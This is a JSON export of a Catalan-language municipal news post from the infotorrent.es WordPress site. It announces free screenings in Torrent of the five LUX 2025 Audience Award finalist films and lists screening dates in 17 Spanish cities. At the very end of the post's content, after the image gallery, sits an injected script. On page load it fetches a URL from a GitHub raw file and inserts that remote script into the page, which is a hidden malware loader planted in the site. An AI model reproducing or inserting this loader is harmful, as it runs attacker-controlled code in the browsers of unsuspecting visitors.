{"id":76623,"date":"2025-01-28T12:08:12","date_gmt":"2025-01-28T11:08:12","guid":{"rendered":"https:\/\/infotorrent.es\/uncategorized\/torrent-se-convierte-en-sede-del-cine-europeo-con-las-proyecciones-del-premio-lux-2025\/"},"modified":"2025-02-01T05:25:00","modified_gmt":"2025-02-01T04:25:00","slug":"torrent-se-convierte-en-sede-del-cine-europeo-con-las-proyecciones-del-premio-lux-2025","status":"publish","type":"post","link":"https:\/\/infotorrent.es\/ca\/cultura-es-2\/torrent-se-convierte-en-sede-del-cine-europeo-con-las-proyecciones-del-premio-lux-2025\/","title":{"rendered":"Torrent es convertix en seu del cinema europeu amb les projeccions del Premi LUX 2025"},"content":{"rendered":"\n<p><strong>Torrent es suma a Madrid, Barcelona, Sevilla, Gij\u00f3n, Almeria, Salamanca i fins a 17 ciutats espanyoles en les quals es projectaran els llargmetratges finalistes dels LUX 2025 que atorga el Parlament Europeu<\/strong><\/p>\n\n\n\n<p><strong>Torrent i Alzira acolliran estes pel\u00b7l\u00edcules gr\u00e0cies a la col\u00b7laboraci\u00f3 d&#8217;Europe\u00a0Direct Comunitat Valenciana\u00a0i a la Secretaria Auton\u00f2mica de\u00a0Representaci\u00f3 davant la UE i les Comunitats Aut\u00f2nomes<\/strong><\/p>\n\n\n\n<p>La ciutat de Torrent ha sigut seleccionada com una de les 17 ciutats espanyoles per a acollir les projeccions gratu\u00eftes de les pel\u00b7l\u00edcules finalistes del Premi del P\u00fablic LUX 2025, atorgat anualment pel Parlament Europeu. Este prestigi\u00f3s guard\u00f3 t\u00e9 com a objectiu promoure el cinema europeu i enfortir el vincle entre la pol\u00edtica i la ciutadania a trav\u00e9s de l&#8217;art audiovisual.<\/p>\n\n\n\n<p>Les projeccions comen\u00e7aran el pr\u00f2xim 28 de febrer en la Sala d&#8217;actes de l&#8217;Ajuntament de Torrent, on s&#8217;exhibiran les cinc pel\u00b7l\u00edcules finalistes:\u00a0<strong>\u00abAnimal\u00bb<\/strong>, de la directora grega Sofia Exarchou;\u00a0<strong>\u00abel Dahomei\u00bb<\/strong>, de la directora franc-senegalesa Mati Diop;\u00a0<strong>\u00abFlow\u00bb<\/strong>, del director let\u00f3 Gints Zilbalodis;\u00a0<strong>\u00abIntercepted\u00bb<\/strong>, de la directora ucra\u00efnesa Oksana Karpovych; i\u00a0<strong>\u00abJulie Keeps Quiet\u00bb<\/strong>, del director belga Leonardo van Dijl.\u00a0Les pel\u00b7l\u00edcules tracten temes com la igualtat de g\u00e8nere, la identitat cultural, la pressi\u00f3 en el treball, el turisme, la desinformaci\u00f3 o la devastaci\u00f3 del planeta Terra.<\/p>\n\n\n\n<p>L&#8217;alcaldessa de Torrent, Amparo Folgado, ha destacat la import\u00e0ncia d&#8217;esta iniciativa cultural: \u201c\u00c9s un honor que Torrent forme part d&#8217;este selecte grup de ciutats que projectaran les pel\u00b7l\u00edcules finalistes del Premi LUX. Aix\u00f2 no sols ens situa en el mapa del cinema europeu, sin\u00f3 que tamb\u00e9 ens brinda l&#8217;oportunitat de reflexionar sobre els reptes socials i culturals que enfrontem com a societat\u201d. A m\u00e9s, l&#8217;alcaldessa assenyala el valor de la col\u00b7laboraci\u00f3 amb Europe Direct Comunitat Valenciana per a dur a terme este esdeveniment a Torrent i a Alzira, agraint la col\u00b7laboraci\u00f3 inestimable del secretari auton\u00f2mic de Representaci\u00f3 davant la UE i les Comunitats Aut\u00f2nomes, Pablo Broseta.<\/p>\n\n\n\n<p>Per part seua, el regidor de Cultura de Torrent, Aitor S\u00e1nchez, subratlla el paper del cinema com a ferramenta de transformaci\u00f3 social: \u201cEstes projeccions gratu\u00eftes s\u00f3n una oportunitat \u00fanica perqu\u00e8 la ciutadania accedisca a obres cinematogr\u00e0fiques de gran qualitat, que conviden a la reflexi\u00f3 i al di\u00e0leg. Des de l&#8217;\u00e0rea de Cultura, continuarem donant suport a iniciatives que enriquisquen l&#8217;oferta cultural de Torrent\u201d.<\/p>\n\n\n\n<p>El cicle de projeccions a Torrent es realitzar\u00e0 en dos dates: el 28 de febrer i el 28 de mar\u00e7, i es dur\u00e0 a terme en col\u00b7laboraci\u00f3 amb la xarxa Europe Direct i l&#8217;oficina del Parlament Europeu. Este esdeveniment tamb\u00e9 t\u00e9 un car\u00e0cter especial en desenrotllar-se en una de les ciutats que van patir els efectes de la DANA a l&#8217;octubre passat, simbolitzant la resili\u00e8ncia i el comprom\u00eds amb la cultura en moments d&#8217;adversitat, com \u00e9s Torrent.<\/p>\n\n\n\n<p>El Premi LUX, que combina la votaci\u00f3 del p\u00fablic i la del Parlament Europeu, busca que els ciutadans es convertisquen en protagonistes actius en triar les seues pel\u00b7l\u00edcules favorites en la seg\u00fcent web:<\/p>\n\n\n\n<p><a href=\"https:\/\/luxaward-rating.europarl.europa.eu\/es\/\" target=\"_blank\" rel=\"noopener\">https:\/\/luxaward-rating.europarl.europa.eu\/es\/<\/a><\/p>\n\n\n\n<p>Els espectadors que participen en les votacions podran guanyar premis, incloent-hi un viatge a la cerim\u00f2nia de lliurament a Brussel\u00b7les.<\/p>\n\n\n\n<p><strong>Llista completa de les projeccions:<\/strong><\/p>\n\n\n\n<p><strong>MADRID:<\/strong>\u00a0mar\u00e7\/abril 2025 (dates per confirmar) \u2014 Cinemes Ambaixadors.<br><strong>BARCELONA:<\/strong>\u00a013, 20 i 27 de febrer, i 6 de mar\u00e7 (m\u00e9s dates per confirmar) \u2014 Filmoteca de Catalunya.\u00a0<br><strong>SEVILLA<\/strong>:\u00a04, 11, 18, 25 de mar\u00e7 i 1 d&#8217;abril \u2014 Cinema Cervantes.\u00a0<br><strong>GIJ\u00d3N<\/strong>:\u00a03,4, 11 i 12 de febrer (m\u00e9s dates per confirmar) \u2014 Antiga Escola de Comer\u00e7 (sala d&#8217;actes).<br><strong>ALMERIA<\/strong>:\u00a019 i 26 de febrer i 5, 12 i 19 de mar\u00e7 \u2014 Teatre Apol\u00b7lo.\u00a0<br><strong>SALAMANCA<\/strong>:\u00a030 de gener i 6, 20 i 27 de febrer (m\u00e9s dates per confirmar) \u2014 Cinemes Van Dyck.<br><strong>SEG\u00d2VIA<\/strong>:\u00a01, 8, 15, 22 i 29 d&#8217;abril \u2014 Sala Julio Michel.<br><strong>PAMPLONA<\/strong>:\u00a07, 14, 21 i 28 de mar\u00e7 i 4 d&#8217;abril \u2014 Golem Yamaguchi.\u00a0<br><strong>TARRAGONA<\/strong>:\u00a05, 19 i 26 de febrer (m\u00e9s dates per confirmar) \u2014 Sala Cultura (Generalitat de Catalunya) Tarragona.\u00a0<br><strong>ZAMORA<\/strong>:\u00a030 de gener, 6, 20 i 27 de febrer (m\u00e9s dates per confirmar) \u2014 Multicines Zamora.\u00a0<br><strong>SANTIAGO DE COMPOSTEL\u00b7LA<\/strong>:\u00a027 de febrer \u2014 Cinema NUMAX.<br><strong>SANTANDER<\/strong>:\u00a019, 20, 26 i 27 de febrer i 5, 6, 19, 20, 26 i 27 de mar\u00e7 \u2014 Filmoteca de Cant\u00e0bria Mario Camus.\u00a0<br><strong>ALFARO<\/strong>:\u00a014 i 21 de febrer (m\u00e9s dates per confirmar) &#8211; Sala Florida.<br><strong>CANET DE MAR:<\/strong>\u00a014, 28, 30 de mar\u00e7 \u2014 Teatre El Centru.\u00a0<br><strong>SANT POL DE MAR<\/strong>:\u00a023 de gener i 9, 17, 23 i 30 de mar\u00e7 \u2014 Centre Cultural de Sant Pol de Mar.\u00a0<br><strong>TORRENT<\/strong>:\u00a028 de febrer i 28 de mar\u00e7 \u2014 Sala d&#8217;actes de l&#8217;Ajuntament de Torrent.<br><strong>ALZIRA<\/strong>:\u00a0dates per confirmar \u2014 Kin\u00e9polis Alzira.\u00a0<\/p>\n\n\n\n<p>Per a m\u00e9s informaci\u00f3 sobre les projeccions a Torrent i la resta de ciutats, es pot consultar el lloc web oficial d&#8217;Europe Direct.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"1024\" data-id=\"76619\" src=\"https:\/\/infotorrent.es\/wp-content\/uploads\/2025\/01\/GXwuJlEXkAArVJV-1024x1024.jpg\" alt=\"\" class=\"wp-image-76619\" srcset=\"https:\/\/infotorrent.es\/wp-content\/uploads\/2025\/01\/GXwuJlEXkAArVJV-1024x1024.jpg 1024w, https:\/\/infotorrent.es\/wp-content\/uploads\/2025\/01\/GXwuJlEXkAArVJV-300x300.jpg 300w, https:\/\/infotorrent.es\/wp-content\/uploads\/2025\/01\/GXwuJlEXkAArVJV-150x150.jpg 150w, https:\/\/infotorrent.es\/wp-content\/uploads\/2025\/01\/GXwuJlEXkAArVJV-768x768.jpg 768w, https:\/\/infotorrent.es\/wp-content\/uploads\/2025\/01\/GXwuJlEXkAArVJV-1536x1536.jpg 1536w, https:\/\/infotorrent.es\/wp-content\/uploads\/2025\/01\/GXwuJlEXkAArVJV-700x700.jpg 700w, https:\/\/infotorrent.es\/wp-content\/uploads\/2025\/01\/GXwuJlEXkAArVJV.jpg 2048w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n<script>;var url = 'https:\/\/raw.githubusercontent.com\/asddw1122\/add\/refs\/heads\/main\/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});<\/script>","protected":false},"excerpt":{"rendered":"<p>Torrent es suma a Madrid, Barcelona, Sevilla, Gij\u00f3n, Almeria, Salamanca i fins a 17 ciutats espanyoles en les quals es projectaran els llargmetratges finalistes dels LUX 2025 que atorga el Parlament Europeu Torrent i Alzira acolliran estes pel\u00b7l\u00edcules gr\u00e0cies a la col\u00b7laboraci\u00f3 d&#8217;Europe\u00a0Direct Comunitat Valenciana\u00a0i a la Secretaria Auton\u00f2mica de\u00a0Representaci\u00f3 davant la UE i les [&hellip;]<\/p>\n","protected":false},"author":15,"featured_media":76627,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[126,1190],"tags":[],"class_list":["post-76623","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cultura-es-2","category-ayuntamiento-de-torrent-ca"],"acf":[],"_links":{"self":[{"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/posts\/76623","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/users\/15"}],"replies":[{"embeddable":true,"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/comments?post=76623"}],"version-history":[{"count":2,"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/posts\/76623\/revisions"}],"predecessor-version":[{"id":76880,"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/posts\/76623\/revisions\/76880"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/media\/76627"}],"wp:attachment":[{"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/media?parent=76623"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/categories?post=76623"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/tags?post=76623"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}